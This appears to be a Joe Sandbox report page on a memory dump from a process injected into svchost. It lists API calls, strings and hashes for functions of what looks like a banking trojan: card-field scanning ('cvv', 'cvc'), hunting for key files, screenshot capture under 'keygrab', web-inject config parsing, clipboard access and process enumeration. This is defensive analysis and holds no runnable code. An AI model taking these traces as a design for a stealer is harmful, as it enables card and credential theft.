Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
String ID:
API String ID: 2984368831-0
Opcode ID: 2a78ebda857b63ee82e51999e9c82b13c676ce9cafe89f9a9ac172b39b733292
Instruction ID: fa7e022fe42381e4320f4c3996209f1eb131cc8a8036f1f6aa664fbaa370f2b9
Opcode Fuzzy Hash: 2a78ebda857b63ee82e51999e9c82b13c676ce9cafe89f9a9ac172b39b733292
Instruction Fuzzy Hash: 5F519179940219EFD710AF74DC05BAE77ACFF49310F118828F986E7280DA78AD51CBA0

Function 02D1FA20 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 174memoryfileCOMMON

Download Yara Rule

APIs

StrStrIW.SHLWAPI(02D0135E,\java\,?,74E15180,00000000,?,?,02D0135E,?,?), ref: 02D1FA5D
StrStrIW.SHLWAPI(02D0135E,\windows\,?,?,02D0135E,?,?), ref: 02D1FA6D
WideCharToMultiByte.KERNEL32(00000000,00000000,02D0135E,000000FF,00000000,00000000,00000000,00000000,?,?,02D0135E,?,?), ref: 02D1FA82
GetProcessHeap.KERNEL32(00000008,00000013,?,?,02D0135E,?,?), ref: 02D1FA9E
HeapAlloc.KERNEL32(00000000,?,?,02D0135E,?,?), ref: 02D1FAA5
memset.MSVCRT ref: 02D1FAB5
WideCharToMultiByte.KERNEL32(00000000,00000000,02D0135E,000000FF,00000000,00000000,00000000,00000000,?,?,02D0135E,?,?), ref: 02D1FAD1
GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 02D1FAEA
GetFileSizeEx.KERNEL32(?,?,?,?,02D0135E,?,?), ref: 02D1FB0B
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,02D0135E,?,?), ref: 02D1FB32
LockFile.KERNEL32(?,00000000,00000000,00000004,00000000,?,?,02D0135E,?,?), ref: 02D1FB42
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,02D0135E,?,?), ref: 02D1FB57
UnlockFile.KERNEL32(?,00000000,00000000,00000004,00000000,?,?,02D0135E,?,?), ref: 02D1FB67
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,74E15180,00000000,?,?,02D0135E,?,?), ref: 02D1FBC3
GetProcessHeap.KERNEL32(00000000,?,?,?,02D0135E,?,?), ref: 02D1FBDA
HeapValidate.KERNEL32(00000000,?,?,02D0135E,?,?), ref: 02D1FBDD
GetProcessHeap.KERNEL32(00000000,?,?,?,02D0135E,?,?), ref: 02D1FBEE
HeapFree.KERNEL32(00000000,?,?,02D0135E,?,?), ref: 02D1FBF1

Strings

\windows\, xrefs: 02D1FA67
iBKS, xrefs: 02D1FB77
\java\, xrefs: 02D1FA57

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$ByteCharMultiPointerWide$AllocFreeLockNamePathReadShortSizeUnlockValidatememset
String ID: \java\$\windows\$iBKS
API String ID: 3399125490-2513530025
Opcode ID: 8dc5dfd04ba2afc91a8179caf3fe7a03f14fcac7bcd8f1bcc1c26fa5581bb01c
Instruction ID: 20b86b433a39ff801512d1569247d3871141b7d01dfc3907ccb7c27031cdc232
Opcode Fuzzy Hash: 8dc5dfd04ba2afc91a8179caf3fe7a03f14fcac7bcd8f1bcc1c26fa5581bb01c
Instruction Fuzzy Hash: 6451DF76A45321BFE7208F21AC58F6B7BECEF45B64F544919BA44DA780D770DC00CAA1

Function 02D1DEF0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 145memorystringthreadCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000,&cvv=,00000000,7591F380,00000000,00000001,00000000,?,?,?,02D184F4,?,?,?,?,?), ref: 02D1DF33
StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02D184F4,?,?,?,?,?,?), ref: 02D1DF41
StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02D184F4,?,?,?,?,?,?), ref: 02D1DF4D
StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02D184F4,?,?,?,?,?,?), ref: 02D1DF5B
StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02D184F4,?,?,?,?,?,?), ref: 02D1DF67
StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02D184F4,?,?,?,?,?,?), ref: 02D1DF79
strstr.MSVCRT ref: 02D1DF8F
strstr.MSVCRT ref: 02D1DFA2
GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02D1E00B
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02D1E012
memset.MSVCRT ref: 02D1E022
CreateThread.KERNEL32(00000000,00000000,02D1E080,00000000,00000000,00000000), ref: 02D1E048
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1E060
CloseHandle.KERNEL32(00000000), ref: 02D1E071

Strings

&cvc=&, xrefs: 02D1DF73
&cvc=, xrefs: 02D1DF61
&cvv2=, xrefs: 02D1DF47
&cvv2=&, xrefs: 02D1DF55
&cvv=&, xrefs: 02D1DF3B
&domain=letitbit.net&, xrefs: 02D1DF89
&cvv=, xrefs: 02D1DF28

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
API String ID: 1632825432-2817208116
Opcode ID: c157dcad99e39a7579b1296ebe2f698a45634465806a299fb8cd77389b7e497c
Instruction ID: a2cb84e96554dd7012d9ba3e2c3fab25e92d6ad2c4851c741125752417ed555c
Opcode Fuzzy Hash: c157dcad99e39a7579b1296ebe2f698a45634465806a299fb8cd77389b7e497c
Instruction Fuzzy Hash: 9D412935A857613BE7220A347CA9FAA27DA8F41789F7C4250EC8097741DF65DE05C3A4

Function 02D01000 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 155memorythreadCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02D0148C,00000000,?), ref: 02D0101B
GetProcessHeap.KERNEL32(00000008,00000013,7591F570,?,02D0148C,00000000,?), ref: 02D0103E
HeapAlloc.KERNEL32(00000000,?,02D0148C,00000000,?), ref: 02D01045
memset.MSVCRT ref: 02D01055
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,7591F570,?,02D0148C,00000000,?), ref: 02D01073
StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02D0148C,00000000,?), ref: 02D01093
CreateThread.KERNEL32(00000000,00000000,02D20320,00000000,00000000,00000000), ref: 02D010B9
StrStrIA.SHLWAPI(00000000,\secrets.key,?,02D0148C,00000000,?), ref: 02D010D5
CreateThread.KERNEL32(00000000,00000000,02D21CE0,00000000,00000000,00000000), ref: 02D010E5
StrStrIA.SHLWAPI(00000000,sign.key,?,02D0148C,00000000,?), ref: 02D010FD
CreateThread.KERNEL32(00000000,00000000,02D227C0,00000000,00000000,00000000), ref: 02D01116
GetHandleInformation.KERNEL32(00000000,?,?,02D0148C,00000000,?), ref: 02D0112A
CloseHandle.KERNEL32(00000000,?,02D0148C,00000000,?), ref: 02D0113B
GetProcessHeap.KERNEL32(00000000,00000000,?,02D0148C,00000000,?), ref: 02D01150
HeapValidate.KERNEL32(00000000,?,02D0148C,00000000,?), ref: 02D01153
GetProcessHeap.KERNEL32(00000000,00000000,?,02D0148C,00000000,?), ref: 02D0115F
HeapFree.KERNEL32(00000000,?,02D0148C,00000000,?), ref: 02D01162

Strings

name.key, xrefs: 02D0108D
sign.key, xrefs: 02D010F7
\secrets.key, xrefs: 02D010CF

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
String ID: \secrets.key$name.key$sign.key
API String ID: 3254303593-2345338882
Opcode ID: 5d54ec01fbdece1ca7c0ac0e3fe7eef7514d382807ed336907182a5fbf2706ae
Instruction ID: c4fbf396c128e35fc85aa42bc19409a9d3c6437e80802b3d51cbb789779f1a3d
Opcode Fuzzy Hash: 5d54ec01fbdece1ca7c0ac0e3fe7eef7514d382807ed336907182a5fbf2706ae
Instruction Fuzzy Hash: 654116355402617B97315A66ACCCFAF3BACDED7FA4B144608FC19A2390DB20CC05C6B2

Function 02D1B0D9 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 129sleepsynchronizationfileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5c590506,00000000,00000001), ref: 02D1B0F6
CreateDirectoryA.KERNEL32(02D5D788,00000000), ref: 02D1B131
GetLastError.KERNEL32 ref: 02D1B137
IsUserAnAdmin.SHELL32 ref: 02D1B13F
PathMakeSystemFolderA.SHLWAPI(02D5D788), ref: 02D1B14E
SetLastError.KERNEL32(00000000), ref: 02D1B155
Sleep.KERNEL32(000003E8), ref: 02D1B18B
CopyFileA.KERNEL32(00000000,02D5D788,00000000), ref: 02D1B1C3
CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02D1B1D6
Sleep.KERNEL32(000003E8), ref: 02D1B1E7
ReleaseMutex.KERNEL32(00000000), ref: 02D1B1EA
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D1B1FC

Strings

5c590506, xrefs: 02D1B0F1, 02D1B0FC
\t, xrefs: 02D1B0F6
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02D1B1CD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutexPathSleep$AdminBackslashCopyDirectoryFileFolderHandleInformationMakeReleaseSystemUser
String ID: 5c590506$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$\t
API String ID: 2754757069-3741519293
Opcode ID: ae802af8782d0162057bc7f63fe4f1b7db1259da741774c346ce591d8d730ccb
Instruction ID: 7a9106053b899d4e2d5254b3b9506e876eb39881384844c024c819088aa132a5
Opcode Fuzzy Hash: ae802af8782d0162057bc7f63fe4f1b7db1259da741774c346ce591d8d730ccb
Instruction Fuzzy Hash: C6414535A80655BBEB210F34BC6CBAB3BD6AF56749F554506FC86CB780CBA08C44C7A0

Function 02D12100 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 02D12060: memset.MSVCRT ref: 02D12082
Part of subcall function 02D12060: GetParent.USER32(?), ref: 02D1208E
Part of subcall function 02D12060: GetWindowTextW.USER32(00000000,?,00000104), ref: 02D120A5
Part of subcall function 02D12060: StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02D120C6

EnterCriticalSection.KERNEL32(02D4FB38,?,?), ref: 02D12136
PathAddBackslashA.SHLWAPI(?,?,00000000), ref: 02D12164
PathAppendA.SHLWAPI(?,?), ref: 02D12178
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D12189
GetLastError.KERNEL32 ref: 02D1218F
IsUserAnAdmin.SHELL32 ref: 02D12198
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D121A9
SetLastError.KERNEL32(?), ref: 02D121B3
PathAppendA.SHLWAPI(?,keygrab), ref: 02D121C5
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D121D0
GetLastError.KERNEL32 ref: 02D121D6
IsUserAnAdmin.SHELL32 ref: 02D121DE
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D121EF
SetLastError.KERNEL32(00000000), ref: 02D121F6
PathAddBackslashA.SHLWAPI(?), ref: 02D12203
_snprintf.MSVCRT ref: 02D12233
LeaveCriticalSection.KERNEL32(02D4FB38,?), ref: 02D12253

Strings

keygrab, xrefs: 02D121B9
\t, xrefs: 02D12164, 02D12203
%02u.bmp, xrefs: 02D12221

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$ErrorLast$AdminAppendBackslashCreateCriticalDirectoryFolderMakeSectionSystemUser$EnterLeaveParentTextWindow_snprintfmemset
String ID: %02u.bmp$keygrab$\t
API String ID: 2122597915-1186222472
Opcode ID: 4cab46ea291474d3c5b7fff7e0e30e3e57ea1644120d768fc665045645bebddb
Instruction ID: e5a405124c3ae1ac97dae5f3cd241be5ae3989e7ad12586d9485b0b2d917d87f
Opcode Fuzzy Hash: 4cab46ea291474d3c5b7fff7e0e30e3e57ea1644120d768fc665045645bebddb
Instruction Fuzzy Hash: 5D319E79940219ABDB10DFA4FC4CADA77B8AF58304F408994A989C7200DBB1DD94CBA0

Function 02D04290 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 194memoryprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D042C3
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D042CE
Process32First.KERNEL32 ref: 02D042F1
GetHandleInformation.KERNEL32(00000000,?), ref: 02D0430D
CloseHandle.KERNEL32(00000000), ref: 02D04327
GetProcessHeap.KERNEL32(00000008,?), ref: 02D04360
HeapAlloc.KERNEL32(00000000), ref: 02D04367
memset.MSVCRT ref: 02D0437B
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02D043AC
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02D043C3
_snprintf.MSVCRT ref: 02D0442C
Process32Next.KERNEL32(?,?), ref: 02D0443B

Strings

[System Process], xrefs: 02D043DB
taskmgr{PIDProcess name, xrefs: 02D042A4
%d%s, xrefs: 02D04423

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
String ID: %d%s$[System Process]$taskmgr{PIDProcess name
API String ID: 3808533164-4214784430
Opcode ID: 0fb5e9f18ce702e1aed60c593fd49bb0ab7bd00789348dfe818d0cfb66af42f9
Instruction ID: c5728d510b3cb2964bb4e2db81ba1efcd79ac9490798a8c53c33b886eff5c98b
Opcode Fuzzy Hash: 0fb5e9f18ce702e1aed60c593fd49bb0ab7bd00789348dfe818d0cfb66af42f9
Instruction Fuzzy Hash: 8361E175904341AFD700CF64A8D8FABBBE9EB95354F448929FA8587390E770EC18CB91

Function 02D20B80 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 192memoryfilestringCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5C59061E,?,75A7BF00), ref: 02D20BB0
CreateDirectoryA.KERNEL32(?,00000000,?,75A7BF00), ref: 02D20BF1
GetLastError.KERNEL32(?,75A7BF00), ref: 02D20BFB
IsUserAnAdmin.SHELL32 ref: 02D20C03
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D20C14
SetLastError.KERNEL32(00000000,?,75A7BF00), ref: 02D20C1B
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,75A7BF00), ref: 02D20C5A
GetFileAttributesA.KERNEL32(?,?,75A7BF00), ref: 02D20C67
SetCurrentDirectoryA.KERNEL32(?,?,75A7BF00), ref: 02D20CB0
VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,75A7BF00), ref: 02D20CCC
lstrcpynA.KERNEL32(00000000,?,00000104,?,75A7BF00), ref: 02D20CE9

Part of subcall function 02D292D0: GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,74E1A250,?,02D138A8,?), ref: 02D292E3
Part of subcall function 02D292D0: HeapAlloc.KERNEL32(00000000,?,02D138A8,?), ref: 02D292E6
Part of subcall function 02D292D0: memset.MSVCRT ref: 02D292FB
Part of subcall function 02D292D0: CreateFileA.KERNEL32(02D138A8,40000000,00000003,00000000,00000002,00000080,00000000,?,02D138A8,?), ref: 02D29352
Part of subcall function 02D292D0: GetProcessHeap.KERNEL32(00000000,00000000,?,02D138A8,?), ref: 02D29375
Part of subcall function 02D292D0: HeapValidate.KERNEL32(00000000,?,02D138A8,?), ref: 02D29378
Part of subcall function 02D292D0: GetProcessHeap.KERNEL32(00000000,00000000,?,02D138A8,?), ref: 02D29384
Part of subcall function 02D292D0: HeapFree.KERNEL32(00000000,?,02D138A8,?), ref: 02D29387

VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,75A7BF00), ref: 02D20D18
PathAddBackslashA.SHLWAPI(5C59061E,?,75A7BF00), ref: 02D20D37
SetFileAttributesA.KERNEL32(?,00000000,?,75A7BF00), ref: 02D20D9B
DeleteFileA.KERNEL32(?,?,75A7BF00), ref: 02D20DA8

Part of subcall function 02D29460: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,74E1A250), ref: 02D294E1
Part of subcall function 02D29460: _snprintf.MSVCRT ref: 02D294FD
Part of subcall function 02D29460: FindFirstFileA.KERNEL32(00000000,?), ref: 02D2950C
Part of subcall function 02D29460: LocalFree.KERNEL32(00000000), ref: 02D29519
Part of subcall function 02D29460: wsprintfA.USER32 ref: 02D29558
Part of subcall function 02D29460: wsprintfA.USER32 ref: 02D29566

Strings

path.txt, xrefs: 02D20D78
inter.zip, xrefs: 02D20C30
5C59061E, xrefs: 02D20BAB, 02D20BB2, 02D20D32, 02D20D39
\, xrefs: 02D20C89

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
String ID: 5C59061E$\$inter.zip$path.txt
API String ID: 3082343898-875366317
Opcode ID: f77be8e008c24acda915319958fc61d24fbd099160bd42b6eb8f6ec814608c08
Instruction ID: c05c84e9aa2ff1020b65fc232b2af111fb63717a8a94b04ba4841c9e998aec91
Opcode Fuzzy Hash: f77be8e008c24acda915319958fc61d24fbd099160bd42b6eb8f6ec814608c08
Instruction Fuzzy Hash: 5A6134749003299FDB218F24A8A8BEA7BE4EF25309F544594E9C9D7340DBB1AD4CCB90

Function 02D0C320 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 124windowsleepthreadCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02D0C32C
GetWindow.USER32(00000000,00000005), ref: 02D0C34D
GetWindow.USER32(00000000), ref: 02D0C350
IsWindowVisible.USER32(00000000), ref: 02D0C355
IsWindowVisible.USER32(00000000), ref: 02D0C364
GetWindowThreadProcessId.USER32(00000000,?), ref: 02D0C377
GetClassNameA.USER32(00000000,?,00000101), ref: 02D0C399
GetWindowInfo.USER32(00000000,?), ref: 02D0C405
SetWindowLongA.USER32(00000000,000000EC,?), ref: 02D0C427
SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 02D0C436
GetClassLongA.USER32(00000000,000000E6), ref: 02D0C43F
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D0C452
SendMessageA.USER32(00000000,000000D2,00000000,00000000), ref: 02D0C462
SendMessageA.USER32(00000000,000000CC,00000000,00000000), ref: 02D0C476
Sleep.KERNEL32(00000000), ref: 02D0C47E
EnumChildWindows.USER32(00000000,02D0C2A0,00000000), ref: 02D0C48C
GetWindow.USER32(00000000,00000003), ref: 02D0C495
Sleep.KERNEL32(00000001), ref: 02D0C4A3

Strings

<, xrefs: 02D0C3FE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$ClassLong$MessageSendSleepVisible$AttributesChildDesktopEnumInfoLayeredNameProcessThreadWindows
String ID: <
API String ID: 2886700239-4251816714
Opcode ID: f9a5d6da36125c2c1276699216b1f98541f5dec8d7441c58ed733edad9040af2
Instruction ID: 21aa697713f841645f188f93f70be1890a531390d463a88e1501d99033de761a
Opcode Fuzzy Hash: f9a5d6da36125c2c1276699216b1f98541f5dec8d7441c58ed733edad9040af2
Instruction Fuzzy Hash: AA41D634AA0215BFE7209F64EC8AFBE37A8EF05755F800705F585E93D0D7A49D11CA64

Function 02D11080 Relevance: 31.8, APIs: 16, Strings: 5, Instructions: 275memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(02D4FB20,00000000,00000000,00000000,?,02D11799), ref: 02D11090
GetProcessHeap.KERNEL32(00000008,00000020,?,02D11799), ref: 02D110F8
HeapAlloc.KERNEL32(00000000,?,02D11799), ref: 02D110FF
strstr.MSVCRT ref: 02D1117F
strstr.MSVCRT ref: 02D11199
strstr.MSVCRT ref: 02D111B3
strstr.MSVCRT ref: 02D111CD
strstr.MSVCRT ref: 02D111F7
GetProcessHeap.KERNEL32(00000008,00000020), ref: 02D11214
HeapAlloc.KERNEL32(00000000), ref: 02D1121B
strstr.MSVCRT ref: 02D11344
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D1137C
HeapValidate.KERNEL32(00000000), ref: 02D1137F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D1138C
HeapFree.KERNEL32(00000000), ref: 02D1138F
LeaveCriticalSection.KERNEL32(02D4FB20,?,02D11799), ref: 02D1139A

Strings

data_before, xrefs: 02D111F1, 02D11244, 02D11336
data_end, xrefs: 02D11249, 02D11293, 02D112E3
data_inject, xrefs: 02D1128E
data_after, xrefs: 02D112DE
set_url , xrefs: 02D11123

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
String ID: data_after$data_before$data_end$data_inject$set_url
API String ID: 2387113551-2328515424
Opcode ID: ad877954ab734cd98833f25b06d466c1dedf0007988335f93469f324ad2ebfff
Instruction ID: 7aed02989c9dbd83ed91f490592c3b5c58eede3a548c9874d257afbfea0cbcfe
Opcode Fuzzy Hash: ad877954ab734cd98833f25b06d466c1dedf0007988335f93469f324ad2ebfff
Instruction Fuzzy Hash: 71A11774A04341AFDB21CF34E4987A6BFE1EF46344F248198D98A8BB45EB71DD09CB90

Function 02D283F0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000000,00000000), ref: 02D283F9
GetFileInformationByHandle.KERNEL32(?,?), ref: 02D28416

Strings

,D0<, xrefs: 02D28597
D0<, xrefs: 02D2858B, 02D285AD, 02D285C3, 02D285B0
D0<, xrefs: 02D28505, 02D2851D, 02D2854A, 02D28508, 02D28520, 02D2854D
,D0<, xrefs: 02D28592

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleInformationType
String ID: ,D0<$,D0<$D0<$D0<
API String ID: 4064226416-1748840775
Opcode ID: 898eb18c879643c59be854f81e6a4e872f3b3a3fdac0bfd5fd84d06e1f784b41
Instruction ID: 4c5ee1197f7d67cde7ffce8d064d0265519cc2d08a82951d4b2e4984c1697983
Opcode Fuzzy Hash: 898eb18c879643c59be854f81e6a4e872f3b3a3fdac0bfd5fd84d06e1f784b41
Instruction Fuzzy Hash: 3251B071D00228ABDB14CFA4DC84FBEBBB9FB54704F54851AEA00EB280D7749D45DBA1

Function 02D12E30 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 173memorythreadclipboardCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D12E4D
GlobalLock.KERNEL32(00000000), ref: 02D12E6E
GetCurrentThreadId.KERNEL32 ref: 02D12E8F
GetGUIThreadInfo.USER32(00000000), ref: 02D12E96
GetOpenClipboardWindow.USER32 ref: 02D12EAC
GetActiveWindow.USER32 ref: 02D12EBA
WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02D12EE8
GetProcessHeap.KERNEL32(00000008,00000013), ref: 02D12F0A
HeapAlloc.KERNEL32(00000000), ref: 02D12F11
memset.MSVCRT ref: 02D12F21
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02D12F3E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D12F8B
HeapValidate.KERNEL32(00000000), ref: 02D12F8E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D12F9B
HeapFree.KERNEL32(00000000), ref: 02D12F9E
GlobalUnlock.KERNEL32(00000000), ref: 02D12FA9
GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02D12FEF

Strings

0, xrefs: 02D12E87

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
String ID: 0
API String ID: 3472172748-4108050209
Opcode ID: 432081da78b8ef1f8e9ab7f91480666a858928aaa9cf4469b376d2157f6a7c83
Instruction ID: d89ea340c45661ee82c333cca589626eced78eff93e8ec38d46eee2ea0d3708f
Opcode Fuzzy Hash: 432081da78b8ef1f8e9ab7f91480666a858928aaa9cf4469b376d2157f6a7c83
